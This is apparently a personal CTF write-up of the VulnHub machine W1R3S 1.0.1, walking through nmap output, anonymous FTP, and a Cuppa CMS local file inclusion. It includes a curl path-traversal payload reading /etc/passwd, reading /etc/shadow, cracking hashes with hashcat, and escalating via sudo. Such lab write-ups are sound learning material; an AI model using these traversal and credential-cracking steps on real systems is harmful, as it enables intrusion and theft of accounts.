6 July 2020
by th3-3inst3in




After configuring the W1R3S: 1.0.1 and getting its ip through nmap. I quicky ran a nmap scan

Nmap results

21/tcp   open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs
|_drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)
|   256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)
|_  256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel



I originally started off with the ftp anonymous login and found 3 folders one contained usernames the rest were just trolls e.g one of the files contained the following test

New FTP Server For W1R3S.inc

I decoded the base64 string and decoded to It is easy, but not that easy..


Next I went on to enumerate the web apps since that seemed to be the most likely way of getting in the server.

I found out that its running Cuppa CMS. I did a quick google search and found this exploit https://www.exploit-db.com/exploits/25971

Though this did not work the file did load up but nothing came up on the page.

I downloaded the source code of the app from https://github.com/CuppaCMS/CuppaCMS and started to dig in myself to verify if the vuln listed on exploit-db exited.

from the exploit on exploit-db the problem was in /alerts/alertConfigField.php (LINE: 22)

exploit db image

I did a quick grep on the mentioned page but nothing came up

grep nothing found

Then I begain to analyze the code further and I saw the following

grep found

and finally using this information I was able to exploit the LFI

curl -X POST --data "urlConfig=../../../../../../../../../etc/passwd"



I was able to read the /etc/shadow file


used hashcat and rockyou.txt to crack the passwords


and logged in with user w1r3s


Priv Esec

I just simply ran sudo su and entered the password computer and voila! got root


tags: ctf - vulnhub
Contact me : Twitter , Facebook